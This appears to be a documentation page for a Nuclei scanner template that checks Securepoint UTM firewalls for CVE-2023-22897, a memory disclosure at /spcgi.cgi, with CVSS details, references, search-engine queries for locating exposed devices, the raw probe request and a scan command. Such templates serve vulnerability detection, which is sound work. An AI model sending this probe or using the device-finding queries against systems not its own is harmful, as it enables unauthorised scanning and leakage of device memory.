Securepoint UTM - Leaking Remote Memory Contents
ID: CVE-2023-22897
Severity: medium
Author: DhiyaneshDK
Tags: cve,cve2023,securepoint,utm,exposure,memory
Description
Section titled “Description”An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall’s endpoint at /spcgi.cgi allows information disclosure of memory contents to be achieved by an authenticated user. Essentially, uninitialized data can be retrieved via an approach in which a sessionid is obtained but not used.
YAML Source
Section titled “YAML Source”id: CVE-2023-22897
info: name: Securepoint UTM - Leaking Remote Memory Contents author: DhiyaneshDK severity: medium description: | An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows information disclosure of memory contents to be achieved by an authenticated user. Essentially, uninitialized data can be retrieved via an approach in which a sessionid is obtained but not used. impact: | An attacker can exploit this vulnerability to gain access to sensitive information stored in the device's memory. remediation: | Apply the latest security patches and updates provided by Securepoint to fix the memory leakage issue. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-22897 - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2023-22897.txt - https://www.rcesecurity.com/2023/04/securepwn-part-2-leaking-remote-memory-contents-cve-2023-22897/ - https://rcesecurity.com - https://github.com/MrTuxracer/advisories classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2023-22897 cwe-id: CWE-908 epss-score: 0.03238 epss-percentile: 0.91228 cpe: cpe:2.3:o:securepoint:unified_threat_management:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: securepoint product: unified_threat_management shodan-query: - title:"Securepoint UTM" - http.title:"securepoint utm" fofa-query: title="securepoint utm" google-query: intitle:"securepoint utm" tags: cve,cve2023,securepoint,utm,exposure,memory
http: - raw: - | POST /spcgi.cgi HTTP/1.1 Host: {{Hostname}} Content-Type: application/json
{}
matchers-condition: and matchers: - type: word part: body words: - '"sessionid":' - '"mode":' condition: and
- type: word part: header words: - "application/json"
- type: status status: - 200# digest: 4a0a00473045022100a04e5bc1700bbf504d623b3e3c56d2b0322af46cc58eeb00ecf697183078541102205dc58b31c239a383cb55c341664063da632f7ef7aa2c7f813b057b1c419ef5f1:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-22897.yaml"